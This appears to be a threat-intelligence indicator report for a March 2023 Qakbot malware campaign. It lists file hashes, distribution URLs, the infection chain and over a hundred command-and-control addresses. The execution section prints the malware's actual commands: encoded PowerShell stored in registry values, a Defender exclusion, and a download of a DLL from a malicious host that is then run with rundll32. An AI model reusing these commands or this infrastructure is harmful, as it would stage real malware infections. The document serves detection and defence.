Qakbot_BB18_07.03.2023.txt

07.03.2023 | Qakbot | BB18 | Campaign 1678202783 | 404.222

*************************************************

.pdf 61f0e80b2a74bf26d2089e09e779b0514b4d7e324de6f968bb224cbe6f2fab91 - redactedCompany.pdf
.url http://85.239.52.29/ONT.php
.url http://85.239.52.47/TIDC.php
.js fd14ec3cdfb9034a19e48717b697a4d1b169c02d24be9ac06b7c876388e1d9ae
.dll f2f80e624a3bcaec31ecb73a8d75715189b7baa73176fa773a986ff80c19976d

*************************************************

Exec

wscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice#DAi(63).js

reg.exe add HKCU\SOFTWARE\cervicobregmaticGinward /v ShellflowerLandowner /d UVGLSOSIdvwLOilIozIGjHezEqdCqEkyxdeEgOOzBGailSwnQmNdmAgvyQhdDsdxLCismmWDCAPUiAWckLOOBktmThYEuGIxjrzFWMDaUaCERVKpPdnJjgWFdrUhgTenPSVQDwzDZKKZeTXUDmbnHXMiUjjScDDUxILRwGxFurYxvYjNbEKSocaqpQRzJRKZvdDCFPLModIuYaQYFnDdPYZmprfPRUDaBXJSVqywChQyWhSeLFTAcZyPjkyibGfFREboiYiKRfQqtUiWBDXeIJdMnEqQRTKbTRhEjeRBqBVbwVYkUHZlAeCWPacePBTKfwnPEEPqJujazCJhQXxAvMwzgotPteCjwyPYBDUuitobiNcrOHJPUTKMARVdKSpbusQFBWPOGqlDtagnEQbbVGncaa

reg.exe add HKCU\SOFTWARE\cervicobregmaticGinward /v neanderthal /d IVsMIyaYOGDvwasADQNqBTYjFSaxZgfnKzlesRhAoBugtyvVsVdFKbvuukjVNVtrjgOpPGKoqUkhsmJdfAhxBkuMoZveehQRtxNPlZhaWRnDjxRIUcKckXhCMHrPCggbrXttrwLmdIoZAACYkxdfbPAkuzkjKjQHHenWMLMIekNcNmlrVbOUuJCZxDOVmAdlxriucwZlQQZttepblmtADBuJjZPQKACOJELaHXJPEJynAbVdnnmyRdKPpylOhWwYhiYennonyolzQXvxRBAcHuVtsEHHOEpJUdMGmuTiRNTptrZbKiynJGdsnXDGaAXqdffuzMTkRjyfSamOyEGGnfeCZmiCoABNvJONKdhQcLvLmWuoiRPlxvJRZabfgRRAOnUOVTANyKtMCkvMjkktBbhXCELngNKSjgMMitnQhuIXNmYiPyvyZYBkbASkphjqigEygmaLONdlYNFGvNbcFlUJbpnrbxfjibPByCigXRTqVspV

reg.exe add HKCU\SOFTWARE\cervicobregmaticGinward /v collocationable /d UDXvEMUiQjjzVLQHNQFTnMCtVayqBIdSgKQXFioWkfOWAkCiHzTNTgFTOEiFHffnHQavBmUTlRWCvMhqqlvGiBOBxxuXolxgOEZDFvCQUsrYrmEDgfFJobdsytriLRWtYulxqXvlLDIXhuKEMpLcbzBneiBYYlrUymsUSkBBTAlUYaYOpekWzMpvNEpeMNdbyMymomSfSxJOfVtSyKctjWEqThQzQmiXMGrrNWaNgSxOnjsmJdsECczPkWKIxoKSUlAkgWeorIJeUzQOiQfzKwzHEdhkzcUzkQiETQAqNfpP

reg.exe add HKCU\SOFTWARE\leuchaemia /v ichthyismusBrigandism /d AHUAcgBrAGEAUwBoAGEAbgB0AHkAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBDAFUAOgBcAFwAUwBPAEYAVABXAEEAUgBFAFwAXABjAGUAcgB2AGkAYwBvAGIAcgBlAGcAbQBhAHQAaQBjAEcAaQBuAHcAYQByAGQAIAB8ACAAJQB7ACQAXwAuAGkAYwBoAHQAaAB5AGkAcwBtAHUAcwBCAHIAaQBnAGEAbgBkAGkAcwBtAH0AOwAgACQATQBhAHoAbwB1AHIAawBhAFMAaABhAG4AdAB5ACAAPQAgACIAcwBpAGwAdABpAGUAcgBPAHMAdABlAGEAbAAiACAAKwAgACQATQBhAHoAbwB1AHIAawBhAFMAaABhAG4AdAB5ADsAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBmAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABNAGEAegBvAHUAcgBrAGEAUwBoAGEAbgB0AHkAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABjAGUAcgB2AGkAYwBvAGIAcgBlAGcAbQBhAHQAaQBjAEcAaQBuAHcAYQByAGQAIAAvAHYAIABpAGMAaAB0AGgAeQBpAHMAbQB1AHMAQgByAGkAZwBhAG4AZABpAHMAbQAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADYALgAyADQAOAAuADkALwBxAEIAUwBUAHcAYwAvAGEAdwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAZwBsAHUAbQBuAGUAcwBzAGUAcwBFAHEAdQBhAHQAbwByAHMALgBkAGwAbAA7ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAGcAbAB1AG0AbgBlAHMAcwBlAHMARQBxAHUAYQB0AG8AcgBzAC4AZABsAGwALABYAEwANQA1ADsA

reg.exe add HKCU\SOFTWARE\leuchaemia /v CalamitousTremplin /d TywIKKBRfJstKzJFMCueSOIDElmvLVDxwxnBuIETXyaVuttgjFAjKzkQcUpdLHLmZLpTYlXPlCSusCKhuCEnZbQZOHLAmBHcWnTvDgNdOWWuauILXUVLpIxpjRXvmSWyjWAlahLLuEzpGjAYQlDjqZDyycfQCINfwWUiegXiHkJrTjAnjmfVZRguuwZZrooPOxmJtDmDWwYwyJQbkvJEFZUhtrOBZxfYbwgi

powershell.exe" $leuchaemia = Get-ItemProperty -Path HKCU:\SOFTWARE\leuchaemia | %{$_.ichthyismusBrigandism}; powershell -windowstyle Minimized -encodedcommand "JABNAGEAegBv$leuchaemia"

powershell.exe" -windowstyle Minimized -encodedcommand $MazourkaShanty = Get-ItemProperty -Path HKCU:\\SOFTWARE\\cervicobregmaticGinward | %{$_.ichthyismusBrigandism}; $MazourkaShanty = "siltierOsteal" + $MazourkaShanty; [Reflection.Assembly]::Load([Convert]::fromBase64String($MazourkaShanty)); [classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hidden ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -ExclusionPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\cervicobregmaticGinward /v ichthyismusBrigandism /f""");Invoke-WebRequest http://45.66.248.9/qBSTwc/aw -O $env:TEMP\glumnessesEquators.dll; rundll32 $env:TEMP\\glumnessesEquators.dll,XL55;

*************************************************

distro urls

http://45.66.248.9/qBSTwc/aw
http://45.66.249.78/jcFACEh/ab

Invoice#DAi(63).js
Attach#XQfDVah(1026).js
Report#qRqsKz(4301).js
Attachments#qvF(7621).js

*************************************************

c2's

47.32.78.150:443
41.228.236.70:995
72.203.216.98:2222
105.109.157.34:990
92.27.86.48:2222
27.109.19.90:2078
190.75.151.215:2222
46.27.231.50:2078
86.195.14.72:2222
213.67.255.57:2222
59.28.84.65:443
79.67.165.149:995
86.196.12.21:2222
86.10.146.216:443
92.154.17.149:2222
92.154.45.81:2222
50.86.217.209:443
64.127.146.153:443
86.202.48.142:2222
70.51.133.238:2222
89.203.252.238:443
105.109.157.34:993
86.190.223.11:2222
86.130.9.136:2222
201.244.108.183:995
213.31.90.183:2222
109.158.144.102:995
70.64.77.115:443
122.184.143.83:443
86.225.214.138:2222
12.172.173.82:50001
208.180.17.32:2222
47.21.51.138:443
12.172.173.82:2087
64.229.202.224:995
103.123.223.168:443
98.163.227.79:443
73.161.178.173:443
91.254.229.61:443
62.35.100.38:443
184.176.35.223:2222
105.109.157.34:2078
201.137.166.52:443
189.222.53.217:443
72.200.109.104:443
184.189.41.80:443
98.187.21.2:443
31.167.215.175:995
67.10.175.47:2222
35.143.97.145:995
88.126.94.4:50000
90.104.22.28:2222
73.36.196.11:443
75.156.125.215:995
82.127.204.82:2222
45.50.233.214:443
47.34.30.133:443
24.117.237.157:443
81.158.112.20:2222
78.193.176.97:443
82.212.112.246:443
104.35.24.154:443
76.170.252.153:995
109.11.175.42:2222
67.61.61.31:443
109.76.174.191:443
109.149.148.242:2222
92.98.139.2:2222
103.71.21.107:443
31.53.29.205:2222
200.109.20.215:2222
73.214.105.238:443
72.88.245.71:443
178.152.28.73:443
70.189.114.159:443
70.24.104.146:2222
94.3.71.196:443
24.187.145.201:2222
70.55.187.152:2222
103.169.83.89:443
47.196.225.236:443
47.16.77.136:2222
190.218.125.145:443
69.159.158.197:2222
2.82.8.80:443
74.92.243.113:50000
80.47.61.240:2222
198.2.51.242:993
80.13.205.69:2222
176.142.207.63:443
50.68.204.71:993
85.241.180.94:443
95.95.175.98:2222
84.35.26.14:995
197.92.136.122:443
174.4.89.3:443
187.199.103.21:32103
190.191.35.122:443
78.192.109.105:2222
90.165.109.4:2222
50.68.204.71:995
49.245.82.178:2222
12.172.173.82:32101
81.229.117.95:2222
184.153.132.82:443
173.178.151.233:443
190.11.198.76:443
190.28.94.54:443
162.248.14.107:443
50.68.186.195:443
108.190.203.42:995
136.35.241.159:443
73.215.22.78:443
87.202.101.164:50000
50.68.204.71:443
12.172.173.82:22
12.172.173.82:995
173.18.126.3:443
75.143.236.149:443
91.169.12.198:32100
